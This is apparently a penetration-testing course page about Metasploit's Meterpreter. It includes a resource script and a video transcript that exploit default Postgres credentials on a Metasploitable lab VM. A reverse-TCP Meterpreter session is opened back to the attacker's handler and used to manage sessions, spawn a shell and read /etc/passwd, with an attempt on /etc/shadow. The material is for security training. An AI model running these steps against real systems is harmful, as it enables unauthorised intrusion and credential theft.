Part 8.1 - Meterpreter



Time: 5 hours 38 minutes
Difficulty: Intermediate
CEU/CPE: 6
Video Description

In this video and the next, Dean reviews the Metasploit Meterpreter shell. This is an extremely useful tool for establishing a session with a remote target and poking around for further vulnerabilities to exploit. Meterpreter is delivered by the exploit's stager, which builds the connection back to the attacker's handler; once the session is open you run Meterpreter-specific commands. You can put the session in the background and return to it later, and you can hold multiple sessions at once, both on the same target and across several targets. The video concludes by mentioning the ability to load additional modules and extensions into a running session. This ability makes Meterpreter an extremely flexible and interactive pentesting environment.
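The workflow the description summarizes, written out as a Metasploit resource script so it can be replayed in a lab. This is an added example, not material from the course: it assumes a Metasploitable target at 192.0.2.129 and a Kali host at 192.0.2.131 (documentation addresses; substitute your own lab IPs), and uses the exploit/linux/postgres/postgres_payload module, which is the Postgres payload exploit the video runs against the default postgres/postgres credentials.

```text
# Added example (not from the course). Save as meterpreter_session.rc and run:
#   msfconsole -q -r meterpreter_session.rc
# Assumed lab addresses: target 192.0.2.129, attacker (handler) 192.0.2.131.

workspace -a metasploitable
setg RHOSTS 192.0.2.129
setg LHOST 192.0.2.131

use exploit/linux/postgres/postgres_payload
set USERNAME postgres
set PASSWORD postgres
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LPORT 4444
show options

# -j runs the exploit as a background job, so the msf prompt returns
# immediately and the new session is left waiting in the background.
exploit -j
sleep 5

# List the open sessions, then interact with the first one.
sessions -l
sessions -i 1
```

Inside the session, `background` returns you to the msf prompt with the session still alive, `sessions -l` shows it alongside any others, and `sessions -i <id>` resumes it. Two checks worth running before anything else: `getuid` shows which account the payload runs as (here the postgres database account, not root, which is why /etc/shadow is unreadable later in the video), and `sysinfo` confirms the target's OS and architecture match the module target you selected. `shell` opens a plain command shell as a channel within the session; `exit` closes that channel without tearing down the Meterpreter session itself.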

Video Transcription
00:05
>> Let's get into discussing Meterpreter. It's an interesting word; it has a Metasploit type of feel to it. Meterpreter is a payload that, once it's delivered, gives you a very highly functional shell on that remote system, and you can do all kinds of other things. A Meterpreter basically will only exist in memory on the target system. This gives you a lot of stealth options as well, since you're not necessarily writing to disk if you're careful and you're choosing the correct options.

I've got my Metasploitable instance already booted up. I know that there's a particular vulnerability which I'm just going to exploit really quickly. We can explain a little bit more about it later, but for the sake of demonstrating the Meterpreter shell, I'm going to go ahead and connect. Let's head that command. I'm going to see which are good. I'm in my Metasploitable workspace. Now, I know that Metasploitable has a Postgres database, just like Kali does actually. Lucky for us, through some experimentation and scanning, I've discovered that the default login and password for Postgres is in place, and that means that the username and the password are both postgres. A lot of software applications will do this. You install the software, a database, a web server, what have you, and you get a default credential set.

What I'm going to do is a quick search for Postgres exploits, because I'm not sure if I remember exactly what the exploit is called. I've got a nice window here. I believe the one that I want is this guy right here, the Postgres payload. As we can see, this is rated as an excellent payload. That gives me a good idea that the payload will work. One thing I want to do beforehand is a setg for my remote host. That way I don't have to type this in every time. I know that my Metasploitable instance is 0.129. I'm going to go ahead and do that. You can do set if you wish; I think setg is just a little bit easier to deal with.

Now I want to use this particular exploit. I'll type my use command and copy and paste this. Now I'm in the context of the Postgres payload. If I show my options, I can see that it's got a default database to search, rather for authentication purposes, and my username is already pre-populated with postgres. I know that the password is supposed to be postgres, based on my research. What I can do is set the password. Another thing I meant to point out earlier is that you'll notice the options for each module are not case sensitive. Your entries, the settings, are case sensitive. If I put in something that's uppercase that's supposed to be lowercase, it's obviously not going to work. But for my password, I know that it's also supposed to be postgres. I'll go ahead and set that. If I verify my options, I can see that everything looks good to go.

Notice that the target is showing me Linux x86, which is good because that's appropriate for this particular target. I can also check to see if there are any advanced options, and there are. We don't need any of these for this particular exploit, but it's good to just poke around when you're looking at an exploit to see what its capabilities are. Targets: it's either x86 or 64-bit x86. I've got two different options there, but the one that I've got selected should work. I'm going to go ahead and type exploit. You can type run as well as a command to actually execute the exploit. I like exploit better because it's more descriptive.

Let's look at what we have here. I started my reverse handler on my local system. I'm listening; my Kali instance is listening on port 444. That's what my local port will be; it's not shown here in my options. It's predefined as part of the exploit. Some of them are like that. You just have to explore each exploit as you use it in order to find the right one. We've connected to the target system on port 5432. This is also a default port that Postgres listens on, and we can see that we've got a banner grab. I got some really good information here. I know this is Postgres version A31. I can see that it's running on Linux, and I can see kernel information here, boom, 2423. I'm also getting some good information about the target in addition to being able to connect. I've transmitted my stager, and if you remember from our previous discussion, the stager is a component of an exploit that helps you to build a connection; then the stage itself gets sent. We see that there's 1.49 meg worth of data, and the stage actually is the component of the exploit that actually builds the connection.

Now I can finally see that I've opened my Meterpreter session between my local system, 131, and the remote system, 129. Of course, we know that Meterpreter worked because I've got a Meterpreter prompt now. Like you would expect, I can type the help command to see what options I've got available within Meterpreter. There are quite a few here. We'll look at the majority of these throughout our course. I would expect that you would poke around and try some of these options on your own as well, because you want to understand what Meterpreter can do for you.

But some really easy things to think about: one of the commands that I always like to think about early in a session is the background command. That lets you put a session in the background and then return to it later. I can run background. It tells me session 1 has now been sent to the background. This is good because the session is still live, but I can get back to the context of my exploit if I want to run some other commands. For instance, I can run the sessions command, and this shows me my active sessions. I may have multiple sessions active with different systems at any given time, or even multiple sessions active with the same target system. I can see I've got a session ID here, session ID of one. It tells me the type of shell and some other information about the system and my connection itself. Now, if I want to go back into interacting with this session, you'll notice I can use the -i option. I can kill my sessions, I can list them, and so on. I can run scripts or some other advanced features. But for right now, what I want to do is go back to the session I've already created. I'll do a sessions -i with a one, because that's my session ID, and now I'm back in my Meterpreter shell.

Once I'm in the Meterpreter shell, I can do lots of different things. For instance, I can look at my core commands. I already showed you background. I can also kill scripts that are running in the background. I can list the scripts running in the background; I can close channels. I can look at info about a particular module. I can load more extensions into Meterpreter. This is a beautiful thing about Meterpreter: it acts as a toehold on that remote system. Once you've got connected with the Meterpreter shell, now you've got a very flexible and interactive environment to bring in other information and other tools and auxiliary modules and so on, or extensions. I can do those things in order to enhance my ability to interact with this system. I can still use and load modules and extensions just like you'd expect. I can even interact with the file system. I can cat a file.

For instance, let's first see what I'm running under. Oh, I'm thinking I'm in a command-line shell; that's why I'm running the wrong commands there. But one thing I can do is try to see if I can look at, for instance, maybe I've tried to compromise the system and now I want to see if I can look at the password file. As you can see, I've been able to look at this password file. It has some information that might be useful, but it really doesn't have any hashes. I'm trying to run the /etc/shadow, or trying to show the /etc/shadow file, and that's not letting me do that. I may not have all of the permissions that I would like. One thing I can do, however, once I've got the Meterpreter shell established, is run the shell command and try to get a command shell. You'll notice I am not root on this command shell, so that's why I could not run /etc/shadow. I am logged in as postgres, which we saw from the exploit options that we set up originally. I'm going to go ahead and exit that command shell. I don't need to be there. I'm going to click Ctrl+C to terminate that channel. My Meterpreter shell is still valid, but that command shell that I launched is now terminated.